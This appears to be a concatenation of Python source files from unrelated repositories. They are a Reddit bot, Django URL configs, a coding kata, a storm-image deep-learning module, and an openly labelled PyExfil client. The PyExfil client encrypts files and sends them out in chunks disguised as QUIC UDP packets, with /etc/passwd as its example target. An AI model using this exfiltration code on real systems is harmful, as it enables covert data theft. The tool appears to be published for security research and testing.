replies.append(submission.id)
print "Checking comments"
flat_comments = praw.helpers.flatten_tree(submission.comments)
for comment in flat_comments:
if comment.id not in replies:
if re.search("Ron Swanson", comment.body, re.IGNORECASE):
y = random.randint(0,3)
print "Bot replying to comment: ", comment.id
comment.reply(REPLY[y])
replies.append(comment.id)
# Save new replies
print "Saving ids to file"
with open("replies.txt", "w") as f:
for i in replies:
f.write(i + "\n")
| dcooper2/Swanson_Bot | swanson_bot.py | Python | mit | 2,143 |
from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth import urls as djangoauth_urls
from search import views as search_views
from blog import views as blog_views
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtailcore import urls as wagtail_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
urlpatterns = [
url(r'^', include(djangoauth_urls)),
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^search/$', search_views.search, name='search'),
# For anything not caught by a more specific rule above, hand over to
# Wagtail's page serving mechanism. This should be the last pattern in
# the list:
url(r'', include(wagtail_urls)),
# Alternatively, if you want Wagtail pages to be served from a subpath
# of your site, rather than the site root:
# url(r'^pages/', include(wagtail_urls)),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| philba/myblog | myblog/urls.py | Python | mit | 1,474 |
from django.conf.urls import patterns, url
from links import views
urlpatterns = patterns('links.views',
url(r'^link/settings/$', views.settings, name = 'settings'),
url(r'^link/donate/(?P<url>[\d\w.]+)$', views.kintera_redirect, name = 'donate'),
url(r'^link/rider/(?P<url>[\d\w.]+)$', views.t4k_redirect, name = 'profile'),
) | ethanperez/t4k-rms | links/urls.py | Python | mit | 340 |
def get_planet_name(id):
switch = {
1: "Mercury",
2: "Venus",
3: "Earth",
4: "Mars",
5: "Jupiter",
6: "Saturn",
7: "Uranus" ,
8: "Neptune"}
return switch[id]
| NendoTaka/CodeForReference | CodeWars/8kyu/planetName.py | Python | mit | 231 |
import sys
import time
import socket
import struct
import random
import hashlib
import urllib2
from Crypto import Random
from Crypto.Cipher import AES
# from itertools import izip_longest
# Setting timeout so that we won't wait forever
timeout = 2
socket.setdefaulttimeout(timeout)
limit = 256*256*256*256 - 1
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def chunkstring(s, n):
return [ s[i:i+n] for i in xrange(0, len(s), n) ]
class AESCipher(object):
def __init__(self, key):
self.bs = 32
self.key = hashlib.sha256(key.encode()).digest()
def encrypt(self, raw):
raw = self._pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return iv + cipher.encrypt(raw)
def decrypt(self, enc):
# enc = base64.b64decode(enc)
iv = enc[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
def _pad(self, s):
return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s)-1:])]
class QUICClient():
def __init__(self, host, key, port=443, max_size=4096):
# Params for all class
self.host = host
self.port = port
self.max_size = max_size - 60
self.AESDriver = AESCipher(key=key)
self.serv_addr = (host, port)
# Class Globals
self.max_packets = 255 # Limitation by QUIC itself.
self._genSeq() # QUIC Sequence is used to know that this is the same sequence,
# and it's a 20 byte long that is kept the same through out the
# session and is transfered hex encoded.
self.delay = 0.1
self.sock = None
if self._createSocket() is 1: # Creating a UDP socket object
sys.exit(1)
self.serv_addr = (self.host, self.port) # Creating socket addr format
def _genSeq(self):
self.raw_sequence = random.getrandbits(64)
parts = []
while self.raw_sequence:
parts.append(self.raw_sequence & limit)
self.raw_sequence >>= 32
self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
# struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4')
return 0
def _createSocket(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock = sock
return 0
except socket.error as e:
sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e)
return 1
def _getQUICHeader(self, count):
if type(count) is not hex:
try:
count_id = chr(count)
except:
sys.stderr.write("Count must be int or hex.\n")
return 1
else:
count_id = count
if count > self.max_packets:
sys.stderr.write("[-]\tCount must be maximum of 255.\n")
return 1
header = "\x0c" # Public Flags
header += self.sequence # Adding CID
header += count_id # Packet Count
return header
def _getFileContent(self, file_path):
try:
f = open(file_path, 'rb')
data = f.read()
f.close()
sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path)
return data
except IOError, e:
sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e))
return 1
def sendFile(self, file_path):
# Get File content
data = self._getFileContent(file_path)
if data == 1:
return 1
# Check that the file is not too big.
if len(data) > (self.max_packets * self.max_size):
sys.stderr.write("[!]\tFile is too big for export.\n")
return 1
# If the file is not too big, start exfiltration
# Exfiltrate first packet
md5_sum = md5(file_path) # Get MD5 sum of file
packets_count = (len(data) / self.max_size)+1 # Total packets
first_packet = self._getQUICHeader(count=0) # Get header for first file
r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count) # First header
r_data = self.AESDriver.encrypt(r_data) # Encrypt data
self.sock.sendto(first_packet + r_data, self.serv_addr) # Send the data
sys.stdout.write("[+]\tSent initiation packet.\n")
# encrypted_content = self.AESDriver.encrypt(data)
# Encrypt the Chunks
raw_dat = ""
chunks = []
while data:
raw_dat += data[:self.max_size]
enc_chunk = self.AESDriver.encrypt(data[:self.max_size])
print len(enc_chunk)
chunks.append(enc_chunk)
data = data[self.max_size:]
i = 1
for chunk in chunks:
this_data = self._getQUICHeader(count=i)
this_data += chunk
self.sock.sendto(this_data, self.serv_addr)
time.sleep(self.delay)
sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count))
i += 1
sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (file_path, self.host, self.port))
# self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
return 0
def close(self):
time.sleep(0.1)
self.sock.close()
return 0
if __name__ == "__main__":
client = QUICClient(host='127.0.0.1', key="123", port=443) # Setup a server
a = struct.unpack('<LL', client.sequence) # Get CID used
a = (a[1] << 32) + a[0]
sys.stdout.write("[.]\tExfiltrating with CID: %s.\n" % a)
client.sendFile("/etc/passwd") # Exfil File
client.close() # Close
| ytisf/PyExfil | pyexfil/network/QUIC/quic_client.py | Python | mit | 6,330 |
"""Deals with input examples for deep learning.
One "input example" is one storm object.
--- NOTATION ---
The following letters will be used throughout this module.
E = number of examples (storm objects)
M = number of rows in each radar image
N = number of columns in each radar image
H_r = number of radar heights
F_r = number of radar fields (or "variables" or "channels")
H_s = number of sounding heights
F_s = number of sounding fields (or "variables" or "channels")
C = number of radar field/height pairs
"""
import copy
import glob
import os.path
import numpy
import netCDF4
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import soundings
from gewittergefahr.gg_utils import target_val_utils
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import number_rounding
from gewittergefahr.gg_utils import temperature_conversions as temp_conversion
from gewittergefahr.gg_utils import storm_tracking_utils as tracking_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
from gewittergefahr.deep_learning import storm_images
from gewittergefahr.deep_learning import deep_learning_utils as dl_utils
SEPARATOR_STRING = '\n\n' + '*' * 50 + '\n\n'
BATCH_NUMBER_REGEX = '[0-9][0-9][0-9][0-9][0-9][0-9][0-9]'
TIME_FORMAT_IN_FILE_NAMES = '%Y-%m-%d-%H%M%S'
DEFAULT_NUM_EXAMPLES_PER_OUT_CHUNK = 8
DEFAULT_NUM_EXAMPLES_PER_OUT_FILE = 128
NUM_BATCHES_PER_DIRECTORY = 1000
AZIMUTHAL_SHEAR_FIELD_NAMES = [
radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME
]
TARGET_NAMES_KEY = 'target_names'
ROTATED_GRIDS_KEY = 'rotated_grids'
ROTATED_GRID_SPACING_KEY = 'rotated_grid_spacing_metres'
FULL_IDS_KEY = 'full_storm_id_strings'
STORM_TIMES_KEY = 'storm_times_unix_sec'
TARGET_MATRIX_KEY = 'target_matrix'
RADAR_IMAGE_MATRIX_KEY = 'radar_image_matrix'
RADAR_FIELDS_KEY = 'radar_field_names'
RADAR_HEIGHTS_KEY = 'radar_heights_m_agl'
SOUNDING_FIELDS_KEY = 'sounding_field_names'
SOUNDING_MATRIX_KEY = 'sounding_matrix'
SOUNDING_HEIGHTS_KEY = 'sounding_heights_m_agl'
REFL_IMAGE_MATRIX_KEY = 'reflectivity_image_matrix_dbz'
AZ_SHEAR_IMAGE_MATRIX_KEY = 'az_shear_image_matrix_s01'
MAIN_KEYS = [
FULL_IDS_KEY, STORM_TIMES_KEY, RADAR_IMAGE_MATRIX_KEY,
REFL_IMAGE_MATRIX_KEY, AZ_SHEAR_IMAGE_MATRIX_KEY, TARGET_MATRIX_KEY,
SOUNDING_MATRIX_KEY
]
REQUIRED_MAIN_KEYS = [
FULL_IDS_KEY, STORM_TIMES_KEY, TARGET_MATRIX_KEY
]
METADATA_KEYS = [
TARGET_NAMES_KEY, ROTATED_GRIDS_KEY, ROTATED_GRID_SPACING_KEY,
RADAR_FIELDS_KEY, RADAR_HEIGHTS_KEY, SOUNDING_FIELDS_KEY,
SOUNDING_HEIGHTS_KEY
]
TARGET_NAME_KEY = 'target_name'
TARGET_VALUES_KEY = 'target_values'
EXAMPLE_DIMENSION_KEY = 'storm_object'
ROW_DIMENSION_KEY = 'grid_row'
COLUMN_DIMENSION_KEY = 'grid_column'
REFL_ROW_DIMENSION_KEY = 'reflectivity_grid_row'
REFL_COLUMN_DIMENSION_KEY = 'reflectivity_grid_column'
AZ_SHEAR_ROW_DIMENSION_KEY = 'az_shear_grid_row'
AZ_SHEAR_COLUMN_DIMENSION_KEY = 'az_shear_grid_column'
RADAR_FIELD_DIM_KEY = 'radar_field'
RADAR_HEIGHT_DIM_KEY = 'radar_height'
RADAR_CHANNEL_DIM_KEY = 'radar_channel'
SOUNDING_FIELD_DIM_KEY = 'sounding_field'
SOUNDING_HEIGHT_DIM_KEY = 'sounding_height'
TARGET_VARIABLE_DIM_KEY = 'target_variable'
STORM_ID_CHAR_DIM_KEY = 'storm_id_character'
RADAR_FIELD_CHAR_DIM_KEY = 'radar_field_name_character'
SOUNDING_FIELD_CHAR_DIM_KEY = 'sounding_field_name_character'
TARGET_NAME_CHAR_DIM_KEY = 'target_name_character'
RADAR_FIELD_KEY = 'radar_field_name'
OPERATION_NAME_KEY = 'operation_name'
MIN_HEIGHT_KEY = 'min_height_m_agl'
MAX_HEIGHT_KEY = 'max_height_m_agl'
MIN_OPERATION_NAME = 'min'
MAX_OPERATION_NAME = 'max'
MEAN_OPERATION_NAME = 'mean'
VALID_LAYER_OPERATION_NAMES = [
MIN_OPERATION_NAME, MAX_OPERATION_NAME, MEAN_OPERATION_NAME
]
OPERATION_NAME_TO_FUNCTION_DICT = {
MIN_OPERATION_NAME: numpy.min,
MAX_OPERATION_NAME: numpy.max,
MEAN_OPERATION_NAME: numpy.mean
}
MIN_RADAR_HEIGHTS_KEY = 'min_radar_heights_m_agl'
MAX_RADAR_HEIGHTS_KEY = 'max_radar_heights_m_agl'
RADAR_LAYER_OPERATION_NAMES_KEY = 'radar_layer_operation_names'
def _read_soundings(sounding_file_name, sounding_field_names, radar_image_dict):
"""Reads storm-centered soundings and matches w storm-centered radar imgs.
:param sounding_file_name: Path to input file (will be read by
`soundings.read_soundings`).
:param sounding_field_names: See doc for `soundings.read_soundings`.
:param radar_image_dict: Dictionary created by
`storm_images.read_storm_images`.
:return: sounding_dict: Dictionary created by `soundings.read_soundings`.
:return: radar_image_dict: Same as input, but excluding storm objects with
no sounding.
"""
print('Reading data from: "{0:s}"...'.format(sounding_file_name))
sounding_dict, _ = soundings.read_soundings(
netcdf_file_name=sounding_file_name,
field_names_to_keep=sounding_field_names,
full_id_strings_to_keep=radar_image_dict[storm_images.FULL_IDS_KEY],
init_times_to_keep_unix_sec=radar_image_dict[
storm_images.VALID_TIMES_KEY]
)
num_examples_with_soundings = len(sounding_dict[soundings.FULL_IDS_KEY])
if num_examples_with_soundings == 0:
return None, None
radar_full_id_strings = numpy.array(
radar_image_dict[storm_images.FULL_IDS_KEY]
)
orig_storm_times_unix_sec = (
radar_image_dict[storm_images.VALID_TIMES_KEY] + 0
)
indices_to_keep = []
for i in range(num_examples_with_soundings):
this_index = numpy.where(numpy.logical_and(
radar_full_id_strings == sounding_dict[soundings.FULL_IDS_KEY][i],
orig_storm_times_unix_sec ==
sounding_dict[soundings.INITIAL_TIMES_KEY][i]
))[0][0]
indices_to_keep.append(this_index)
indices_to_keep = numpy.array(indices_to_keep, dtype=int)
radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY] = radar_image_dict[
storm_images.STORM_IMAGE_MATRIX_KEY
][indices_to_keep, ...]
radar_image_dict[storm_images.FULL_IDS_KEY] = sounding_dict[
soundings.FULL_IDS_KEY
]
radar_image_dict[storm_images.VALID_TIMES_KEY] = sounding_dict[
soundings.INITIAL_TIMES_KEY
]
return sounding_dict, radar_image_dict
def _create_2d_examples(
radar_file_names, full_id_strings, storm_times_unix_sec,
target_matrix, sounding_file_name=None, sounding_field_names=None):
"""Creates 2-D examples for one file time.
E = number of desired examples (storm objects)
e = number of examples returned
T = number of target variables
:param radar_file_names: length-C list of paths to storm-centered radar
images. Files will be read by `storm_images.read_storm_images`.
:param full_id_strings: length-E list with full IDs of storm objects to
return.
:param storm_times_unix_sec: length-E numpy array with valid times of storm
objects to return.
:param target_matrix: E-by-T numpy array of target values (integer class
labels).
:param sounding_file_name: Path to sounding file (will be read by
`soundings.read_soundings`). If `sounding_file_name is None`, examples
will not include soundings.
:param sounding_field_names: See doc for `soundings.read_soundings`.
:return: example_dict: Same as input for `write_example_file`, but without
key "target_names".
"""
orig_full_id_strings = copy.deepcopy(full_id_strings)
orig_storm_times_unix_sec = storm_times_unix_sec + 0
print('Reading data from: "{0:s}"...'.format(radar_file_names[0]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_names[0],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
if this_radar_image_dict is None:
return None
if sounding_file_name is None:
sounding_matrix = None
sounding_field_names = None
sounding_heights_m_agl = None
else:
sounding_dict, this_radar_image_dict = _read_soundings(
sounding_file_name=sounding_file_name,
sounding_field_names=sounding_field_names,
radar_image_dict=this_radar_image_dict)
if this_radar_image_dict is None:
return None
if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
return None
sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]
full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]
these_indices = tracking_utils.find_storm_objects(
all_id_strings=orig_full_id_strings,
all_times_unix_sec=orig_storm_times_unix_sec,
id_strings_to_keep=full_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)
target_matrix = target_matrix[these_indices, :]
num_channels = len(radar_file_names)
tuple_of_image_matrices = ()
for j in range(num_channels):
if j != 0:
print('Reading data from: "{0:s}"...'.format(radar_file_names[j]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_names[j],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
tuple_of_image_matrices += (
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
)
radar_field_names = [
storm_images.image_file_name_to_field(f) for f in radar_file_names
]
radar_heights_m_agl = numpy.array(
[storm_images.image_file_name_to_height(f) for f in radar_file_names],
dtype=int
)
example_dict = {
FULL_IDS_KEY: full_id_strings,
STORM_TIMES_KEY: storm_times_unix_sec,
RADAR_FIELDS_KEY: radar_field_names,
RADAR_HEIGHTS_KEY: radar_heights_m_agl,
ROTATED_GRIDS_KEY:
this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
ROTATED_GRID_SPACING_KEY:
this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields(
tuple_of_image_matrices),
TARGET_MATRIX_KEY: target_matrix
}
if sounding_file_name is not None:
example_dict.update({
SOUNDING_FIELDS_KEY: sounding_field_names,
SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
SOUNDING_MATRIX_KEY: sounding_matrix
})
return example_dict
def _create_3d_examples(
radar_file_name_matrix, full_id_strings, storm_times_unix_sec,
target_matrix, sounding_file_name=None, sounding_field_names=None):
"""Creates 3-D examples for one file time.
:param radar_file_name_matrix: numpy array (F_r x H_r) of paths to storm-
centered radar images. Files will be read by
`storm_images.read_storm_images`.
:param full_id_strings: See doc for `_create_2d_examples`.
:param storm_times_unix_sec: Same.
:param target_matrix: Same.
:param sounding_file_name: Same.
:param sounding_field_names: Same.
:return: example_dict: Same.
"""
orig_full_id_strings = copy.deepcopy(full_id_strings)
orig_storm_times_unix_sec = storm_times_unix_sec + 0
print('Reading data from: "{0:s}"...'.format(radar_file_name_matrix[0, 0]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_name_matrix[0, 0],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
if this_radar_image_dict is None:
return None
if sounding_file_name is None:
sounding_matrix = None
sounding_field_names = None
sounding_heights_m_agl = None
else:
sounding_dict, this_radar_image_dict = _read_soundings(
sounding_file_name=sounding_file_name,
sounding_field_names=sounding_field_names,
radar_image_dict=this_radar_image_dict)
if this_radar_image_dict is None:
return None
if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
return None
sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]
full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]
these_indices = tracking_utils.find_storm_objects(
all_id_strings=orig_full_id_strings,
all_times_unix_sec=orig_storm_times_unix_sec,
id_strings_to_keep=full_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)
target_matrix = target_matrix[these_indices, :]
num_radar_fields = radar_file_name_matrix.shape[0]
num_radar_heights = radar_file_name_matrix.shape[1]
tuple_of_4d_image_matrices = ()
for k in range(num_radar_heights):
tuple_of_3d_image_matrices = ()
for j in range(num_radar_fields):
if not j == k == 0:
print('Reading data from: "{0:s}"...'.format(
radar_file_name_matrix[j, k]
))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=radar_file_name_matrix[j, k],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
tuple_of_3d_image_matrices += (
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
)
tuple_of_4d_image_matrices += (
dl_utils.stack_radar_fields(tuple_of_3d_image_matrices),
)
radar_field_names = [
storm_images.image_file_name_to_field(f)
for f in radar_file_name_matrix[:, 0]
]
radar_heights_m_agl = numpy.array([
storm_images.image_file_name_to_height(f)
for f in radar_file_name_matrix[0, :]
], dtype=int)
example_dict = {
FULL_IDS_KEY: full_id_strings,
STORM_TIMES_KEY: storm_times_unix_sec,
RADAR_FIELDS_KEY: radar_field_names,
RADAR_HEIGHTS_KEY: radar_heights_m_agl,
ROTATED_GRIDS_KEY:
this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
ROTATED_GRID_SPACING_KEY:
this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights(
tuple_of_4d_image_matrices),
TARGET_MATRIX_KEY: target_matrix
}
if sounding_file_name is not None:
example_dict.update({
SOUNDING_FIELDS_KEY: sounding_field_names,
SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
SOUNDING_MATRIX_KEY: sounding_matrix
})
return example_dict
def _create_2d3d_examples_myrorss(
azimuthal_shear_file_names, reflectivity_file_names,
full_id_strings, storm_times_unix_sec, target_matrix,
sounding_file_name=None, sounding_field_names=None):
"""Creates hybrid 2D-3D examples for one file time.
Fields in 2-D images: low-level and mid-level azimuthal shear
Field in 3-D images: reflectivity
:param azimuthal_shear_file_names: length-2 list of paths to storm-centered
azimuthal-shear images. The first (second) file should be (low)
mid-level azimuthal shear. Files will be read by
`storm_images.read_storm_images`.
:param reflectivity_file_names: length-H list of paths to storm-centered
reflectivity images, where H = number of reflectivity heights. Files
will be read by `storm_images.read_storm_images`.
:param full_id_strings: See doc for `_create_2d_examples`.
:param storm_times_unix_sec: Same.
:param target_matrix: Same.
:param sounding_file_name: Same.
:param sounding_field_names: Same.
:return: example_dict: Same.
"""
orig_full_id_strings = copy.deepcopy(full_id_strings)
orig_storm_times_unix_sec = storm_times_unix_sec + 0
print('Reading data from: "{0:s}"...'.format(reflectivity_file_names[0]))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=reflectivity_file_names[0],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
if this_radar_image_dict is None:
return None
if sounding_file_name is None:
sounding_matrix = None
sounding_field_names = None
sounding_heights_m_agl = None
else:
sounding_dict, this_radar_image_dict = _read_soundings(
sounding_file_name=sounding_file_name,
sounding_field_names=sounding_field_names,
radar_image_dict=this_radar_image_dict)
if this_radar_image_dict is None:
return None
if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
return None
sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]
full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]
these_indices = tracking_utils.find_storm_objects(
all_id_strings=orig_full_id_strings,
all_times_unix_sec=orig_storm_times_unix_sec,
id_strings_to_keep=full_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)
target_matrix = target_matrix[these_indices, :]
azimuthal_shear_field_names = [
storm_images.image_file_name_to_field(f)
for f in azimuthal_shear_file_names
]
reflectivity_heights_m_agl = numpy.array([
storm_images.image_file_name_to_height(f)
for f in reflectivity_file_names
], dtype=int)
num_reflectivity_heights = len(reflectivity_file_names)
tuple_of_image_matrices = ()
for j in range(num_reflectivity_heights):
if j != 0:
print('Reading data from: "{0:s}"...'.format(
reflectivity_file_names[j]
))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=reflectivity_file_names[j],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
this_matrix = numpy.expand_dims(
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY], axis=-1
)
tuple_of_image_matrices += (this_matrix,)
example_dict = {
FULL_IDS_KEY: full_id_strings,
STORM_TIMES_KEY: storm_times_unix_sec,
RADAR_FIELDS_KEY: azimuthal_shear_field_names,
RADAR_HEIGHTS_KEY: reflectivity_heights_m_agl,
ROTATED_GRIDS_KEY:
this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
ROTATED_GRID_SPACING_KEY:
this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
REFL_IMAGE_MATRIX_KEY: dl_utils.stack_radar_heights(
tuple_of_image_matrices),
TARGET_MATRIX_KEY: target_matrix
}
if sounding_file_name is not None:
example_dict.update({
SOUNDING_FIELDS_KEY: sounding_field_names,
SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
SOUNDING_MATRIX_KEY: sounding_matrix
})
num_az_shear_fields = len(azimuthal_shear_file_names)
tuple_of_image_matrices = ()
for j in range(num_az_shear_fields):
print('Reading data from: "{0:s}"...'.format(
azimuthal_shear_file_names[j]
))
this_radar_image_dict = storm_images.read_storm_images(
netcdf_file_name=azimuthal_shear_file_names[j],
full_id_strings_to_keep=full_id_strings,
valid_times_to_keep_unix_sec=storm_times_unix_sec)
tuple_of_image_matrices += (
this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
)
example_dict.update({
AZ_SHEAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields(
tuple_of_image_matrices)
})
return example_dict
def _read_metadata_from_example_file(netcdf_file_name, include_soundings):
"""Reads metadata from file with input examples.
:param netcdf_file_name: Path to input file.
:param include_soundings: Boolean flag. If True and file contains
soundings, this method will return keys "sounding_field_names" and
"sounding_heights_m_agl". Otherwise, will not return said keys.
:return: example_dict: Dictionary with the following keys (explained in doc
to `write_example_file`).
example_dict['full_id_strings']
example_dict['storm_times_unix_sec']
example_dict['radar_field_names']
example_dict['radar_heights_m_agl']
example_dict['rotated_grids']
example_dict['rotated_grid_spacing_metres']
example_dict['target_names']
example_dict['sounding_field_names']
example_dict['sounding_heights_m_agl']
:return: netcdf_dataset: Instance of `netCDF4.Dataset`, which can be used to
keep reading file.
"""
netcdf_dataset = netCDF4.Dataset(netcdf_file_name)
include_soundings = (
include_soundings and
SOUNDING_FIELDS_KEY in netcdf_dataset.variables
)
example_dict = {
ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)),
TARGET_NAMES_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[TARGET_NAMES_KEY][:])
],
FULL_IDS_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[FULL_IDS_KEY][:])
],
STORM_TIMES_KEY: numpy.array(
netcdf_dataset.variables[STORM_TIMES_KEY][:], dtype=int
),
RADAR_FIELDS_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[RADAR_FIELDS_KEY][:])
],
RADAR_HEIGHTS_KEY: numpy.array(
netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int
)
}
# TODO(thunderhoser): This is a HACK to deal with bad files.
example_dict[TARGET_NAMES_KEY] = [
n for n in example_dict[TARGET_NAMES_KEY] if n != ''
]
if example_dict[ROTATED_GRIDS_KEY]:
example_dict[ROTATED_GRID_SPACING_KEY] = getattr(
netcdf_dataset, ROTATED_GRID_SPACING_KEY)
else:
example_dict[ROTATED_GRID_SPACING_KEY] = None
if not include_soundings:
return example_dict, netcdf_dataset
example_dict.update({
SOUNDING_FIELDS_KEY: [
str(s) for s in netCDF4.chartostring(
netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:])
],
SOUNDING_HEIGHTS_KEY:
numpy.array(netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:],
dtype=int)
})
return example_dict, netcdf_dataset
def _compare_metadata(netcdf_dataset, example_dict):
"""Compares metadata between existing NetCDF file and new batch of examples.
This method contains a large number of `assert` statements. If any of the
`assert` statements fails, this method will error out.
:param netcdf_dataset: Instance of `netCDF4.Dataset`.
:param example_dict: See doc for `write_examples_with_3d_radar`.
:raises: ValueError: if the two sets have different metadata.
"""
include_soundings = SOUNDING_MATRIX_KEY in example_dict
orig_example_dict = {
TARGET_NAMES_KEY: [
str(s) for s in
netCDF4.chartostring(netcdf_dataset.variables[TARGET_NAMES_KEY][:])
],
ROTATED_GRIDS_KEY: bool(getattr(netcdf_dataset, ROTATED_GRIDS_KEY)),
RADAR_FIELDS_KEY: [
str(s) for s in netCDF4.chartostring(
netcdf_dataset.variables[RADAR_FIELDS_KEY][:])
],
RADAR_HEIGHTS_KEY: numpy.array(
netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:], dtype=int
)
}
if example_dict[ROTATED_GRIDS_KEY]:
orig_example_dict[ROTATED_GRID_SPACING_KEY] = int(
getattr(netcdf_dataset, ROTATED_GRID_SPACING_KEY)
)
if include_soundings:
orig_example_dict[SOUNDING_FIELDS_KEY] = [
str(s) for s in netCDF4.chartostring(
netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:])
]
orig_example_dict[SOUNDING_HEIGHTS_KEY] = numpy.array(
netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:], dtype=int
)
for this_key in orig_example_dict:
if isinstance(example_dict[this_key], numpy.ndarray):
if numpy.array_equal(example_dict[this_key],
orig_example_dict[this_key]):
continue
else:
if example_dict[this_key] == orig_example_dict[this_key]:
continue
error_string = (
'\n"{0:s}" in existing NetCDF file:\n{1:s}\n\n"{0:s}" in new batch '
'of examples:\n{2:s}\n\n'
).format(
this_key, str(orig_example_dict[this_key]),
str(example_dict[this_key])
)
raise ValueError(error_string)
def _filter_examples_by_class(target_values, downsampling_dict,
test_mode=False):
"""Filters examples by target value.
E = number of examples
:param target_values: length-E numpy array of target values (integer class
labels).
:param downsampling_dict: Dictionary, where each key is the integer
ID for a target class (-2 for "dead storm") and the corresponding value
is the number of examples desired from said class. If
`downsampling_dict is None`, `example_dict` will be returned
without modification.
